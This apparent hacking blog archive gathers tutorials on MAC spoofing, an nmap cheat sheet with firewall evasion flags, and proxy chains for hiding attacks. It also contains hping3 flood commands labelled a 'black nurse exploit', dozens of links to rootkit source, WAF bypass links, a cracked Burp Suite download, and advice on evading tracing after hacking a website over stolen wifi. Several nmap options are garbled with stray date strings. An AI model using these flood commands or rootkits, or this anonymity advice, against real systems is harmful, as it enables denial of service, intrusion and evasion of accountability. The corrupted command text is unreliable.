Swapnil CySec: 2016

Wednesday, December 7, 2016

Step by step how to change mac address in kali linux

Step by step How to Change MAC Address on Kali Linux:

1. Open your terminal, and type ifconfig | grep HWaddr you will see your original MAC address, mine was 08:00:27:b2:4d:4b

2. To temporary change our MAC address, we need to turn off the network interface first by running this command ifconfig eth0 down
3. After that we can configure the new MAC address ifconfig eth0 hw ether 00:00:00:00:00:02you can change the MAC address using this hexadecimal format XX:XX:XX:XX:XX:XX

4. Now we can turn on the network interface again ifconfig eth0 up

5. And the last we can check again our MAC whether it's change or not. if we follow until this step, MAC address will back to default after we restart our machine. Go to next page to view how to change MAC address permanently.

6.Kali Linux was built based on Debian. In Debian all the network interface was located on/etc/network/interfaces.

7. We will configure the/etc/network/interfaces. In this tutorial I will use pico text editor, but you can choose any of your favourite text editor. pico /etc/network/interfaces

8. Now we will add one line of script to change our MAC address permanently pre-up ifconfig eth0 hw ether 00:00:00:00:00:02 This script will be called on system startup.

9. If we want to restore the default MAC address,just add the#sign in front of script in step 8.

#pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

Monday, December 5, 2016

Simple black nurse exploit

hping3 -1 -C 3 -K 3 -i u20 <target ip>
hping3 -1 -C 3 -K 3 --flood <target ip>

Rootkit tutorial

Get you hands dirty with Rootkits

https://github.com/mempodippy/vlany
http://www.ussrback.com/UNIX/penetration/rootkits/
https://github.com/Alifcccccc/Windows-Rootkits
https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html
https://github.com/islamTaha12/Python-Rootkit
https://github.com/Eterna1/puszek-rootkit
https://github.com/juxing/AdoreForAndroid
https://github.com/HackerFantastic/Public/tree/master/rootkits
https://github.com/m0nad/Diamorphine
https://github.com/maK-/maK_it-Linux-Rootkit
https://github.com/RagingGrim/Rootkit/tree/master/Rootkit
https://github.com/NexusBots/Umbreon-Rootkit
https://github.com/josephjkong/designing-bsd-rootkits
https://github.com/citypw/suterusu/ --> https://citypw.blogspot.gr/2014/08/an-awesome-linux-kernel-rootkit-suterusu.html
https://github.com/Cr4sh/WindowsRegistryRootkit
https://packetstormsecurity.com/files/139665/Vlany-Linux-LD_PRELOAD-Rootkit.html
https://github.com/JReFrameworker/JReFrameworker
https://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html
https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html
https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html
https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html
https://packetstormsecurity.com/files/25071/_root_040.zip.html
https://github.com/bones-codes/the_colonel
https://github.com/x0r1/jellyfish
https://github.com/ecume/simple-rootkit
https://github.com/Nervous/GreenKit-Rootkit
https://github.com/cloudsec/brootkit
https://github.com/unix-thrust/beurk
https://github.com/NextSecurity/Gozi-MBR-rootkit
https://github.com/rbertin/basic-rootkit
https://github.com/miagilepner/porny
https://turbochaos.blogspot.gr/2013/09/linux-rootkits-101-1-of-3.html
https://github.com/r00tkillah/HORSEPILL
https://github.com/matteomattia/moo_rootkit
https://github.com/ivyl/rootkit
https://github.com/enzolovesbacon/inficere
https://github.com/hiteshd/Android-Rootkit
https://github.com/QuokkaLight/rkduck
https://github.com/0xroot/whitesnow
https://github.com/falk3n/subversive
https://github.com/nnewson/km
/tree/master/src
https://github.com/Cr4sh/DrvHide-PoC
https://github.com/Christian-Roggia/open-myrtus/tree/master/rootkit
https://github.com/PoppySeedPlehzr/rookit_playground/tree/master/rootkits
https://github.com/a7vinx/liinux
https://github.com/osiris123/CDriver_Loader
https://github.com/varshapaidi/Kernel_Rootkit
https://github.com/karol-gruszczyk/win-rootkit
https://github.com/hanj4096/wukong
https://github.com/uzyszkodnik/rootkit
https://github.com/kacheo/KernelRootkit
https://github.com/rvillordo/libpreload
https://github.com/soad003/rootkit
https://github.com/NinnOgTonic/Out-of-Sight-Out-of-Mind-Rootkit
https://github.com/HeapLock/THOR
https://github.com/ring-1/zendar
https://github.com/amanone/amark
https://github.com/majdi/deadlands
https://github.com/cccssw/JynKbeast
https://github.com/joshimhoff/toykit
https://github.com/pasv/Z34107
https://github.com/maK-/Keylogger-lkm
https://github.com/Aearnus/syscall-rootkit
https://github.com/schischi/slrk
https://github.com/bhassani/Alina/tree/master/Rootkit
https://github.com/jiayy/lkm-rootkit
https://github.com/ChristianPapathanasiou/apache-rootkit
https://github.com/ChristianPapathanasiou/DEFCON-18-Android-rootkit-Mindtrick
https://github.com/elfmaster/kprobe_rootkit
https://github.com/ah450/rootkit
https://github.com/Jyang772/HideProcessHookMDL
https://github.com/Aarons100/Rootkits-Playground
https://github.com/dluengo/yarr
https://github.com/NotALaser/trk

Fake email sender website

Follow site

Website

Solve cyber crime case

Solve cyber crime case:>
Q.
I live in city A and city B is 100km far from here I changed MAC address of my laptop and took it with me to the city B. I hacked a wifi to use internet and hacked a website with it. I came back to my city A and changed my MAC address again. So...is there any way to track me? Or I am"100% anonymous"

Ans:>

Time travel of package
Ipaddress
Mac address
Fingers printing
Etag I'd.
Unique browser id
Usernagent
Hostname (user-pc:hacker)
Refferal x-forword ipaddress
Cookies and flash cookies.
Ips logs
Using service logs

Proxy server and proxy chain

Topic: Proxy Chains
So I think every Ultimate knows about Proxy Servers.
Basically,
We connect to a website like this
Our PC>>>>Website
It means we are in a direct contact with website and that website can trace us easily.
They know who downloaded data fr their website.
.
Now by using a Proxy we connect to the website like this
Our PC>>>>Proxy Server>>>>Website
So we are not in direct contact with the website.
Proxies may take records of who used their servers as a proxy.
Some proxies are honeypotted, which means government/bad guys use them to steal our information.
.
So now lets talk about Proxy Chains
When we use multiple proxies simultaneously then its called a Proxy Chain.
With a proxy chain we connect to the website ilke this
Our PC>>>Proxy server 1>>Proxy2>>Proxy3>>Proxy4>>Website
.
For example If we attacked a websites through proxchains
Then here is how the Site Admin will try to track us.
.
Website: Listen proxy4, You are Hacker and I know it, you are going to jail.
Proxy4: No, I am just a proxy server man.
Website: Oh sorry, Can you tell me who used your service?
P4: Let me check in my records...Ummm Proxy3 used my service.
He is the Hacker.
*Admin somehow manages to contact the admin of server*
Admin: So you think you can fool me with your proxy? LOL
Proxy3: No I am not a hacker, I am just a Proxy Server.
Proxy2 used my service
Admin: Really? Oh ok
.
*Admin is frustrated andcontacts Proxy2*
Proxy2: I am also a Proxy Server. I transfered the data to proxy1
*Admin contacts proxy1*
Proxy1: I am also a proxy server but I cant tell you who used my service.
Admin: Why?
Proxy1: Because someone hacked into my server and deleted my logs
Admin: Oh shit! But there must be a way to find him too. Like I reached you.
Proxy1: And what if he using another proxy chain?
*both cry in corner*
.
Ok sorry for that twisted climax 😁
Now you should know these things before getting excited:
1) Proxy Chaining is far more secure than using just one proxy. It can hide your IP well.
2) They decrease the speed of your tasks as the data have to travel a long path
3) I already mentiomed the HoneyPot part.
4) Proxy chains should be used with a VPN for 'significant' anonymity
And thats highly recommended
.

Monday, November 28, 2016

How to install Linux debian OS in Android mobile without rooting

Steps>>
1.install GNURoot Debian app from play store (size =60mb)
2.click install/ reinstall button
It will take 15min
3.go launch tab n select launch button

Friday, November 18, 2016

Open Source Intelligent gathering tool n technique

Download pdf

Nmap tutorial n command

Nmap Tool All Commands Collection
****************************************
Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl Thursday, October 08, 2016 16:14 UTC+9 [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout Thursday, October 08, 2016 16:14 UTC+9 [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout Thursday, October 08, 2016 16:14 UTC+9 [target]

Minimum Scan delay —-> nmap –scan-delay Thursday, October 08, 2016 16:14 UTC+9 [target]

Maximum scan delay —-> nmap –max-scan-delay Thursday, October 08, 2016 16:14 UTC+9 [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every Thursday, October 08, 2016 16:14 UTC+9 [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

Burp Suit download

Burp suit 1 link

Burp suit 2 link

Burp suit 3 link

Download burp suit crack version

WAF bypass

http://wafbypass.me/w/index.php/Main_Page
http://www.freebuf.com/articles/web/10099.html
http://tech-technical.com/index.php/2015/11/11/waf-bypass-sql-injection-tutorial/
http://webvuln.blogspot.hk/2015_04_01_archive.html
http://www.wooyun.org/bugs/wooyun-2014-089426
https://forum.90sec.org/forum.php?mod=viewthread&tid=9133
http://www.idiot-attacker.com/2016/02/macam-macam-kode-bypass-waf.html
http://wooyun.org/bugs/wooyun-2010-0121291
http://wooyun.org/bugs/wooyun-2010-0115175
http://drops.wooyun.org/tips/7883
http://www.securityidiots.com/Web-Pentest/WAF-Bypass/
http://www.pentest.net.cn/post/7
http://www.mottoin.com/86886.html
http://mp.weixin.qq.com/s?__biz=MzIyNjQzMjcyNw==&mid=2247483860&idx=1&sn=fa19f02e29d25f5f6852af27451ae4a9&scene=23&srcid=0815JYA53l0Bk3PMkhzRlKUh#rd
https://github.com/borbelyau/bypass-waf-ids-ips/blob/master/evasionsqli_methods

Tuesday, November 15, 2016

How to Extract app from google play store

Follow this link n u can extract app from Google play store

Link

Wednesday, October 19, 2016

Ethical hacking and programming book

Some programming book and hacking website

Swapnil CySec